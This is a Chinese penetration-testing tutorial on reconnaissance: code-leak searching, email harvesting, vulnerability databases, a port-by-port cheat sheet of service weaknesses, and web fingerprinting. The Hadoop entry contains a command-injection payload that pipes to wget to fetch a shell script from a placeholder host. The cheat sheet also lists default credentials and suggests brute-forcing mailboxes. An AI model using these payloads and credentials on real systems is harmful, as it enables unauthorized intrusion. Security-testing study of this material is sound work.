渗透测试之敏感信息收集
二、敏感信息收集
- Web源代码泄露
最想强调的是源代码信息泄露了,直接去github、国内csdn平台、码云上搜索,收获往往是大于付出。可能有人不自信认为没能力去SRC挖洞,可是肯定不敢说不会上网不会搜索。github相关的故事太多,但是给人引出的信息泄露远远不仅在这里:github.com、rubygems.org、pan.baidu.com…
QQ群备注或介绍等,甚至混入企业qq工作群…
然后说再多,也没这个好用:https://sec.xiaomi.com/article/37 全自动监控github
源代码信息泄露收集可能会用到如下地址:
网盘搜索:http://www.pansou.com/或https://www.lingfengyun.com/ 网盘密码破解可参考:https://www.52pojie.cn/thread-763130-1-1.html
源码搜索:https://searchcode.com/、https://gitee.com/、gitcafe.com、code.csdn.net
Gitee - 基于 Git 的代码托管和研发协作平台
2.2 邮箱信息收集
收集邮箱信息主要有两个作用:1.通过发现目标系统账号的命名规律,可以用来后期登入其他子系统。2.爆破登入邮箱用。
通常邮箱的账号有如下几种生成规律: 比如某公司有员工名叫做“老马”,它的邮箱可能如下:
怎么找到这个人的昵称呢?请看11.1GoogleHack谷歌搜索引擎用法
Xiaomage@xxx.com sxt@xxx.com Tony@xxx.com
当我们收集几个邮箱之后,便会大致猜出对方邮箱的命名规律。除了员工的邮箱之外,通过公司会有一些共有的邮箱,比如人力的邮箱、客服的邮箱,hr@xxx.com/kefu@xxx.com,这种邮箱有时会存在弱口令,在渗透时可额外留意一下。我们可以通过手工或者工具的方式来确定搜集邮箱
手工的方式:
1.可以到百度等搜索引擎上搜索邮箱信息
2.github等第三方托管平台 3.社工库
社工库信息泄露:https://www.instantcheckmate.com/
工具方式:
在邮箱收集领域不得不提一个经典的工具,The Harvester,The Harvester可用于搜索Google、Bing和PGP服务器的电子邮件、主机以及子域名,因此需要翻墙运行该工具。工具下载地址为:https://github.com/laramies/theHarvester
• 注:python -m pip install -r requirements.txt 导入相关配置,python3.6版本
使用方式很简单:
./theHarvester.py -d 域名 -1 1000 -b all
2.3 历史漏洞收集
仔细分析,大胆验证,发散思维,对企业的运维、开发习惯了解绝对是有很大的帮助。可以把漏洞保存下来,进行统计,甚至炫一点可以做成词云展示给自己看,看着看着或者就知道会有什么漏洞。
wooyun 历史漏洞库:http://www.anquan.us/ 、http://wooyun.2xss.cc/
教育行业漏洞报告平台(Beta)https://src.edu-info.edu.cn/login/
SRC众测平台
国际漏洞提交平台 https://www.hackerone.com/
BugX区块链漏洞平台 http://www.bugx.org/
Gsrc瓜子src https://security.guazi.com/
区块链安全响应中心 https://dvpnet.io/
CNVD国家信息安全漏洞平台 http://www.cnvd.org.cn/
漏洞银行:https://www.bugbank.cn/
360补天:https://www.butian.net/
教育行业漏洞报告平台(Beta)https://src.edu-info.edu.cn/login/
国内平台
知道创宇seebug漏洞平台 https://www.seebug.org/
工控系统行业漏洞平台 http://ivd.winicssec.com/
打造中文最大exploit库 http://www.expku.com/
为数不多的漏洞管理插件收集平台 http://www.bugscan.net/source/template/vulns/
一家管理漏洞收集的平台 漏洞银行
国外平台
国际漏洞提交平台 https://www.hackerone.com/
xss poc http://xssor.io/
oday漏洞库 https://www.0day.today/
路由器漏洞库 http://routerpwn.com/
cve漏洞平台 http://cve.mitre.org/
github泄露:
in:name test #仓库标题搜索含有关键字
SpringCloudin:descripton test #仓库描述搜索含有关键字
in:readme test #Readme文件搜素含有关键字
stars:>3000 test #stars数量大于3000的搜索关键字
stars:1000..3000 test #stars数量大于1000小于3000的搜索关键字
forks:>1000 test #forks数量大于1000的搜索关键字
forks:1000..3000 test #forks数量大于1000小于3000的搜索关键字
size:>=5000 test #指定仓库大于5000k(5M)的搜索关键字
pushed:>2019-02-12 test #发布时间大于 2019-02-12的搜索关键字
created:>2019-02-12 test #创建时间大于2019-02-12的搜索关键字
user:test #用户名搜素license:apache-2.0 test #明确仓库的 LICENSE 搜索关键字
language:java test #在java语言的代码中搜索关键字
user:test in:name test #组合搜索,用户名test的标题含有test的。
2.4常见漏洞
快速扫描:
Masscan -p80,800 ip --rate=10000
21 / FTP
匿名/暴力破解
拒绝服务
22 / SSH
暴力破解
23 / telnet
Winbox(CVE-2018-14847)
https://github.com/BasuCert/WinboxPoC
弱口令 / 暴力破解
161 / snmp
弱口令
https://blog.csdn.net/archersaber39/article/details/78932252
389 / ladp
匿名访问
https://www.cnblogs.com/persuit/p/5706432.html
ladp注入
http://www.4hou.com/technology/9090.html
https://www.freebuf.com/articles/web/149059.html
443 / ssl
openssl心脏出血
https://paper.seebug.org/437/
http://www.anquan.us/static/drops/papers-1381.html
https://www.freebuf.com/sectool/33191.html
445 / smb
win10拒绝服务
永恒之蓝RCE
875 / rsync
匿名访问
http://www.anquan.us/static/bugs/wooyun-2016-0190815.html
https://paper.seebug.org/409/
http://www.91ri.org/11093.html
1433 / mssql
暴力破解
http://www.anquan.us/static/drops/tips-12749. html
https://www.seebug.org/appdir/Microsoft%20SQL%20Server
1521 / oracle
暴力破解
https://www.exploit-db.com/exploits/33084
2601 / zebra
http://www.anquan.us/static/bugs/wooyun-2013-047409.html
3128 / squid
3306 / mysql
RCE
http://www.91ri.org/17511.html
CVE-2015-0411
hash破解
https://www.freebuf.com/column/153561.html
waf绕过
https://www.freebuf.com/articles/web/155570.html
general_log_file getshell
https://www.freebuf.com/column/143125.html
提权
http://www.91ri.org/16540.html
3312 / kangle
getshell
https://www.secpulse.com/archives/23927.html
3389 / rdp
shift 放大镜 输入法绕过 guest用户
永恒之蓝(ESTEEMAUDIT)
https://www.freebuf.com/articles/system/132171.html
https://www.anquanke.com/post/id/86328
ms12-020
https://blog.csdn.net/meyo_leo/article/details/77950552
4440 / rundeck
https://www.secpulse.com/archives/29500.html
4848 / glassfish
文件读取
https://www.secpulse.com/archives/42277.html
https://www.anquanke.com/post/id/85948
GlassFish2 / admin:admin GlassFish3,4 / 如果管理员不设置帐号本地会自动登录,远程访问会提示配置错误
5432 / PostgreSQL
RCE
https://www.cnblogs.com/KevinGeorge/p/8521496.html
https://www.secpulse.com/archives/69153.html
默认账号postgres
参考
http://www.91ri.org/13070.html
http://www.91ri.org/6507.html
5672,15672,4369,25672 / RabbitMQ
(guest/guest)
5900 / VNC
https://www.seebug.org/appdir/RealVNC
5984 / CouchDB
http://xxx:5984/_utils/
6082 / varnish
CLI 未授权
https://www.secpulse.com/archives/10681.html
6379 / redis
Redis未授权
ssh publickey
crontab
webshell
反序列化
开机自启文件夹写bat
参考
https://www.freebuf.com/column/170710.html
7001,7002 / WebLogic
默认弱口令
weblogic/weblogic ,weblogic/welcom ,weblogic/welcom1,weblogic1/weblogic
反序列
CVE-2018-2628
https://www.freebuf.com/articles/web/169770.html
https://www.seebug.org/appdir/WebLogic
9200,9300 / elasticsearch
CVE-2015-1427
http://www.anquan.us/static/drops/papers-5142.html
CVE-2018-17246
https://www.seebug.org/vuldb/ssvid-97730
参考
https://www.seebug.org/search/?keywords=elasticsearch
9000 / fcgi
https://paper.seebug.org/289/
9043 / WebSphere
Websphere8.5
https://localhost:9043/ibm/console/logon.jsp
Websphere6-7
http://localhost:9043/ibm/console
后台未授权,登录后可部署WAR包
SOAP服务有反序列化
弱口令:admin / password
11211 / memcache
未授权
UDP反射
https://shockerli.net/post/memcached-udp-reflection-attack-bug/
27017,27018 / Mongodb
未授权
注入
https://www.anquanke.com/post/id/83763
phpMoAdmin RCE
https://www.aqniu.com/threat-alert/6978.html
50000 / SAP
SAP命令执行
https://www.secpulse.com/archives/20204.html
50070,50030 / hadoop
未授权
https://www.freebuf.com/vuls/173638.html
命令执行
host:50060/pstack?pid=123|wget http://somehost/shell.sh
https://www.seebug.org/search/?keywords=hadoop
其他
http://www.91ri.org/15441.html
2.5DNS域传送漏洞
dnsenum的目的是尽可能收集一个域的信息,它能够通过谷歌或者字典文件猜测可能存在的域名,以及对一个网段进行反向查询。它可以查询网站的主机地址信息、域名服务器、mx record(函件交换记录),在域名服务器上执行axfr请求,通过谷歌脚本得到扩展域名信息(google hacking),提取自域名并查询,计算C类地址并执行whois查询,执行反向查询,把地址段写入文件。
用法:
在kail 中 dnsenum +域名 -f/dns.txt –dnserver
dnsenum参数说明:
-h 查看工具使用帮助
–dnsserver 指定域名服务器
–enum 快捷选项,相当于"–threads 5 -s 15 -w"
–noreverse 跳过反向查询操作
–nocolor 无彩色输出
–private 显示并在"domain_ips.txt"文件结尾保存私有的ips
–subfile 写入所有有效的子域名到指定文件
-t, --timeout tcp或者udp的连接超时时间,默认为10s(时间单位:秒)
–threads 查询线程数
-v, --verbose 显示所有的进度和错误消息
-o ,–output 输出选项,将输出信息保存到指定文件
-e, --exclude 反向查询选项,从反向查询结果中排除与正则表达式相符的PTR记录,在排查无效主机上非常有用
-w, --whois 在一个C段网络地址范围提供whois查询
-f dns.txt 指定字典文件,可以换成 dns-big.txt 也可以自定义字典
相关解析记录说明可参考:
DNS记录类型介绍(A记录、MX记录、NS记录等) - 百度文库
2.6工具信息收集
如:7kbscan、破壳Web极速扫描器等
2.7指纹、waf 、CDN信息收集
2.7.1.在线识纹识别网址:
指纹识别存在通杀漏洞
http://whatweb.bugscaner.com/look/
http://www.yunsee.cn/finger.html
指纹识别查询|:whatweb.bugscaner.com/look/
2.7.2.Waf识别
github.com/Enablesecurity/wafw00f
2.7.3.CDN识别
https://raw.githubusercontent.com/3xp10it/mytools/master/xcdn.py
验证是否存在CDN
方法1:
使用各种多地 ping 的服务,查看对应 IP 地址是否唯一,如果不唯一多半是使用了CDN, 多地 Ping 网站有:
http://ping.chinaz.com/
http://ping.aizhan.com/
http://ce.cloud.360.cn/
方法2:
试用nslookup进行检测,如果返回域名解析对应多个IP,那么多半是试用了CDN.
nslookup http://example.com
方法3:
在线工具查看是否存在CDN,可以参考以下站点:
http://www.cdnplanet.com/tools/cdnfinder
http://www.ipip.net/ip.html
2.7.4.常见指纹检测的对象
1、CMS信息:比如大汉CMS、织梦、帝国CMS、phpcms、ecshop等;
2、前端技术:比如HTML5、jquery、bootstrap、pure、ace等;
3、Web服务器:比如Apache、lighttpd, Nginx, iis等;
4、应用服务器:比如Tomcat、Jboss、weblogic、websphere等;
5、开发语言:比如PHP、Java、Ruby、Python、C#等;
6、操作系统信息:比如linux、win2k8、win7、kali、centos等;
7、CDN信息:是否使用CDN,如cloudflare、360cdn、365cyd、yunjiasu等;
8、WAF信息:是否使用waf,如Topsec、Jiasule、Yundun等;
9、iP及域名信息:iP和域名注册信息、服务商信息等;
10、端口信息:有些软件或平台还会探测服务器开放的常见端口。
2.7.5.常见指纹识别软件
Wappalyzer(集成在浏览器或可单独)
whatweb(集成在kali)
what web -v(详细信息)+ 域名
Web Develpoer(浏览器集成)
御剑web指纹识别
wtfscan
2.7.6.常见指纹识别方式
1、特定文件的MD5
一些网站的特定图片文件、js文件、css等静态文件,如favicon.ico、css、logo.ico、js等文件一般不会修改,通过爬虫对这些文件进行抓取并比对md5值,如果和规则库中的Md5一致则说明是同一cms。这种方式速度比较快,误报率相对低一些,但也不排除有些二次开发的cms会修改这些文件。获得哈希值,工具对比。
2、正常页面或错误网页中包含的关键字
先访问首页或特定页面如robots.txt等,通过正则的方式去匹配某些关键字,如Powered by Discuz、dedecms等。
或者可以构造错误页面,根据报错信息来判断使用的cms或者中间件信息,比较常见的如tomcat的报错页面。
3、请求头信息的关键字匹配
根据网站response返回头信息进行关键字匹配,whatweb和Wappalyzer就是通过banner信息来快速识别指纹,
之前fofa的web指纹库很多都是使用的这种方法,效率非常高,基本请求一次就可以,但搜集这些规则可能会耗时很长。
而且这些banner信息有些很容易被改掉。
根据response header一般有以下几种识别方式:
查看http响应报头的X-Powered-By字段来识别;
根据Cookies来进行判断
比如一些waf会在返回头中包含一些信息,如360wzws、safedog、yunsuo等;
根据header中的server信息来判断
如DVRDVs-Webs、yunjiasu-nginx、Mod_security、nginx-wallarm等;
根据WWW-Authenticate进行判断一些路由交换设备可能存在这个字段,如NETCORE、huawei、h3c等设备。
4、部分URL中包含的关键字
比如wp-includes、dede等URL关键特征通过规则库去探测是否有相应目录,
或者根据爬虫结果对链接url进行分析,或者对robots.txt文件中目录进行检测等等方式,通过url地址来判别是否使用了某CMs,
比如wordpress默认存在wp-includes和wp-admin目录,织梦默认管理后台为dede目录,solr平台可能使用/solr目录,weblogic可能使用wls-wsat目录等。
5、开发语言的识别
web开发语言一般常见的有PHP、jsp、aspx、asp等,常见的识别方式有:
通过爬虫获取动态链接进行直接判断是比较简便的方法。
asp判别规则如下
<a[>]*?href=(‘|”)[http][^>]*?.asp(?|#|\1),其他语言可替换相应asp即可。
通过X-Powered-By进行识别
比较常见的有X-Powered-By: AsP.NET或者X-Powered-By: PHP/7.1.8
通过set-Cookie进行识别
这种方法比较常见也很快捷,比如set-Cookie中包含PHPssiONiD说明是php、包含jsessionid说明是java、包含asp.net_sessionid说明是aspx等。
渗透测试之敏感信息收集相关推荐
- Kali渗透测试之被动信息收集
一.渗透测试的流程 信息收集(很重要,时间占比30% ~ 50%) 漏洞扫描 漏洞利用 提权 清除痕迹,留后门 写渗透测试报告 其中信息收集很重要,它通常占整个渗透测试过程所需时间的30% ~ 50% ...
- 渗透测试之全方位信息收集神器 instarecon
功能介绍 instarecon将从以下几个方面展开渗透测试前的信息收集工作 1. DNS (direct, PTR, MX, NS) lookups 包括域名的dns解析结果: PTR记录:是电子邮件 ...
- Kali Linux 渗透测试之被动信息收集(三)——Recon-NG框架
Recon-NG框架 (1)Recon-NG框架简介 Recon-NG是由python编写的一个开源的Web侦查(信息收集)框架,命令格式与msf一致: Recon-NG框架是一个全特性的工具,使用它 ...
- 小白日记5:kali渗透测试之被动信息收集(四)--theHarvester,metagoofil,meltag,个人专属密码字典--CUPP
1.theHarvester theHarvester是一个社会工程学工具,它通过搜索引擎.PGP服务器以及SHODAN数据库收集用户的email,子域名,主机,雇员名,开放端口和banner信息. ...
- 小白日记2:kali渗透测试之被动信息收集(一)
一.被动信息收集 被动信息收集指的是通过公开渠道可获得的信息,与目标系统不产生直接交互,尽量避免留下一切痕迹的信息探测.被动探测技术收集的信息可以大致分为两类, 即配置信息和状态信息. 被动探测可收集 ...
- Kali Linux渗透测试之被动信息收集(一)——nslookup、dig、DNS区域传输,DNS字典爆破,DNS注册信息
一.被动信息收集 1.被动信息搜集 公开渠道可获得信息: 与目标系统不产生直接交互: 尽量避免留下痕迹: 2.搜集的内容 IP地址段,域名信息,邮件地址,文档图片数据,公司地址,公司组织架构.联系电话 ...
- Kali Linux渗透测试之被动信息收集(一)——nslookup、dig、DNS区域传输、DNS字典爆破、DNS注册信息
1. 被动信息搜集 (1)被动信息搜集 公开渠道可获得的信息: 与目标系统不产生直接交互: 尽量避免留下痕迹: (2)搜集的内容 IP地址段.域名信息.邮件地址.文档图片数据.公司地址.公司组织架构. ...
- 渗透测试之ip信息收集
1.通过域名获取ip信息 如果我们渗透的是一个域名(baidu.com),我们便可以通过域名来获得ip信息.如果我们已经获得了ip地址,那么这一步可以直接省略. 将域名转换成ip地址的服务就是dns解 ...
- 渗透测试中信息收集的那些事
渗透测试中信息收集的那些事 转载自:TideSec(知名安全团队)--VllTomFord(大佬)------https://www.cnblogs.com/OpenCyberSec/p/107941 ...
- 内网渗透学习-Windows信息收集
内网渗透学习-Windows信息收集 本章内容主要介绍在获取网站服务器webshell后,怎样对Windows主机进行信息收集,对其网络环境进行分析和利用,主要是一个思路整理,在后续的章节中会整理更详 ...
最新文章
- 机器学习基本概念-阿里云大学
- HDU2553 N皇后问题
- [LeetCode][JavaScript]Invert Binary Tree 反转二叉树
- 微软一站式示例代码库 2012 年2月示例代码更新。8个全新示例为您的开发保驾护航...
- springboot 切换日志实现
- IntelliJ IDEA 项目开发中各个目录的关系
- ❤️六W字《计算机基础知识》(八)(建议收藏)❤️
- 达摩院研发自动驾驶高精定位系统,无GPS信号也可实现厘米级定位
- 编译原理教程_6 LR分析法
- mongodb之replSet复制集 + auth
- 【优化算法】非支配排序遗传算法(NSGA)【含Matlab源码 176期】
- 收集表的使用与批量图片下载
- 夜深人静写算法(六)- 最近公共祖先
- 计算机家庭网络共享,教大家家庭局域网如何共享
- python画散点图<plt.scatter() 和sns.scatterplot()>
- 力扣题解:45. 跳跃游戏 II
- 做谷歌广告投放关键字英文,只懂英文可以吗?
- 实验一 8255并行接口实验
- 大数据量10道面试题及解析
- RegularExpressionValidator 控件
热门文章
- 固态硬盘测试软件有哪些,SSD测试软件有哪些?SSD测试软件盘点
- 后缀–ize_后缀-ize,-ise含义、来源和词例
- 计算机网络由两部分组成包括通信子网和,计算机网络由两部分组成,包括通信子网和___A.计算机子网 B.资源......
- 计算机组成原理实验箱教程,计算机组成原理实验箱介绍.ppt
- xhEditor使用方法2
- aso关键词优化,我们该不该去做?
- 深入理解之border属性(第一期)
- xul界面编程语法_探索XUL中的多线程编程
- 点云配准icp算法推导
- IDEA 中 Lombok 编译报错 Java 找不到符号问题